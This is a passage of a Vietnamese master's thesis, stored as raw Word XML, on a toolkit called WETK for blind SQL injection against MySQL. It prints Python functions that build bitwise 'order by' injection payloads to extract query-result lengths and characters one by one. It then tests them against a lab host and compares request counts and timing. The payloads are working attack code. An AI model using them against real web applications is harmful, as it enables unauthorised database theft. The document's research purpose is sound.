            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>self.sendHTTPRequest(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t xml:space="preserve">resultText </w:t>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>r.text</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>pos1 = resultText.find(self.standard_dict[1])</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>post_dict = {}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>for i in range(2,10):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>pos = resultText.find(self.standard_dict[i])</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>if pos &lt; pos1:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>#Before 1 ==&gt; -@hbn ==&gt; 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>post_dict[i] = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>post_dict[i] = 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>s = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>for i in range(9,1,-1):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>x = pow(2,i-2) * post_dict[i]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>s = s+x</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>return (s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004064FA" w:rsidRDefault="004064FA" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="009B48A0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() và </w:t>
      </w:r>
      <w:r w:rsidRPr="009B48A0">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() thiết lập mã tấn công, rồi gửi đến hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="004064FA">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>getQueryResult</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>() để lấy kết quả. Về chức năng các hàm này tương tự hàm trong các module còn lại.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00161298" w:rsidRDefault="00161298" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="009B48A0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00161298" w:rsidRPr="00161298" w:rsidTr="00161298">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:t>def getMySQLLength(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t xml:space="preserve">payload </w:t>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>= "order by (select if((@hbn:=@hbn%2b1)&lt;10,if(@hbn=1,1,if((select length(({0}))) %26 pow(2,@hbn-2) &gt; 0,@hbn,-@hbn)),1000) from  (select @hbn:=0) as t)".format(query)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>self.resultLength = (self.getQueryResult(payload))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00161298" w:rsidRDefault="00161298" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="009B48A0">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00161298" w:rsidRPr="00161298" w:rsidTr="00161298">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:t>def getMySQLQueryResult(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>if(self.resultLength != None):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>for i in range(0, self.resultLength):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>payload =</w:t>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>"order by (select if((@hbn:=@hbn%2b1)&lt;10,if(@hbn=1,1,if((select ascii(substring(({0}),{1},1))) %26 pow(2,@hbn-2) &gt; 0,@hbn,-@hbn)),1000) from  (select @hbn:=0) as t)".format(query, i+1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>tmp = (self.getQueryResult(payload))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(tmp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>chr(tmp)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00161298" w:rsidRDefault="00161298" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Hàm runner thực hiện chạy câu lệnh SQL, gọi đến hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00731E3A">
        <w:t>runMySQLQuery</w:t>
      </w:r>
      <w:r>
        <w:t>(), từ đây sẽ lần lượt thực hiện lấy độ dài kết quả, rồi lấy từng ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00161298" w:rsidRDefault="00161298" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hàm __init__ thực hiện khởi tạo các thành phần liên quan, cần sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10140" w:rsidRPr="00CC2642" w:rsidRDefault="00161298" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chi tiết về toàn bộ mã tấn công của phương pháp tìm kiếm nhị phân tham khảo </w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mục 4 P</w:t>
      </w:r>
      <w:r>
        <w:t>hụ lục của luận văn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRPr="005D3C52" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc459822525"/>
      <w:r>
        <w:t>Thử nghiệm và đ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t>ánh giá kết quả</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRPr="005D3C52" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Để đánh giá hiệu quả của từng phương pháp cần đo được số lượng yêu cầu gửi đi, và thời gian để thực hiện xong mã tấn công. Để lấy các thông tin này có thể sử dụng các công cụ để đo, chặn bắt gói tin như: </w:t>
      </w:r>
      <w:r w:rsidRPr="007F4307">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, tcpdump.. Tuy nhiên, bộ framework </w:t>
      </w:r>
      <w:r w:rsidRPr="007F4307">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã hỗ trợ tính năng này. Để sử dụng chỉ cần bật tham số debug (-d) của công cụ, các thông tin chi tiết sẽ được hiển thị.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Lần lượt thử nghiệm chạy các module, tương ứng với các phương pháp tấn công. Trước tiên cần gọi đến module đó, và xem các tham số cần để nạp vào khi chạy module bằng cách sử dụng tham số -so (show module options). Các tham số mà Required là YES thì bắt buộc phải có.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FF79C23" wp14:editId="092DD33E">
            <wp:extent cx="5502656" cy="2429049"/>
            <wp:effectExtent l="19050" t="0" r="27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b="-17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5502656" cy="2429049"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRPr="00CB53C6" w:rsidRDefault="00571796" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc459819462"/>
      <w:r w:rsidRPr="00CB53C6">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00CB53C6">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0030524E">
        <w:t>Hiển thị các option của module sqlinjection.b</w:t>
      </w:r>
      <w:r>
        <w:t>lind</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E0DB3FC" wp14:editId="2EBEA8CF">
            <wp:extent cx="5565288" cy="24213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5568891" cy="2422899"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc459819463"/>
      <w:r w:rsidRPr="0030524E">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="0030524E">
        <w:t>: Hiển thị các option của module sqlinjection.b</w:t>
      </w:r>
      <w:r>
        <w:t>inary_search</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="635ED401" wp14:editId="47F81D27">
            <wp:extent cx="5625081" cy="253191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632343" cy="2535183"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRPr="003A3F0E" w:rsidRDefault="00571796" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc459819464"/>
      <w:r w:rsidRPr="003A3F0E">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="003A3F0E">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0030524E">
        <w:t>Hiển thị các option của module sqlinjection.b</w:t>
      </w:r>
      <w:r>
        <w:t>it_shift</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD230E">
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cung cấp sẵn cả hai giao thức là GET và POST, cũng như hỗ trợ việc truyền vào inject point. Inject point là điểm vào mắc lỗi, nơi mà sẽ truyền vào các mã tấn công. Inject point có thể ở trong URL, post data, cookie… . để truyền inject point thì sử dụng dấu *. Mặc định một lần thì chỉ có 1 điểm inject point. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trong môi trường thực nghiệm, vị trí lỗi là tham số point trên địa chỉ url. Do đó ta sẽ nhập url là </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidRPr="00A56025">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.59/vul.php?point=1%20*</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. Các mã  tấn công sẽ được truyền vào vị trí của dấu *.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Một tham số nữa cũng bắt buộc là PATTERN. Tham số này cung cấp mẫu để xác định đúng/sai. Trong phần 4.1 nếu đúng sẽ trả về danh sách thí sinh. Do đó sẽ lấy một đoạn mẫu trong danh sách để </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD230E">
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nhận diện đúng sai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thông thường, để thực thi một query cần phải có bước lấy độ dài của chuỗi trả về. Tuy nhiên, để tránh ảnh hưởng kết quả thực nghiệm lấy 1 ký tự (chỉ tập trung vào các yêu cầu cần thiết để lấy nội dung ký tự trong chuỗi) sẽ bỏ qua bước này. Cần tiến hành cấu hình sẵn câu lệnh sẽ thực hiện, và độ dài của kết quả trả về. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Trong bài kiểm tra đầu tiên, thực hiện lấy 01 ký tự. Các module sẽ chạy để lấy kết quả của câu truy vấn: select “Z”. Câu truy vấn này sẽ trả về kết quả là 1 ký tự (độ dài bằng 1). Trước tiên là với module cơ bản sqlinjection.blind:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14834580" wp14:editId="0B0DFB4C">
            <wp:extent cx="5972175" cy="673266"/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="673266"/>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62 và thời gian thực hiện xong là 144 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0F2A">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
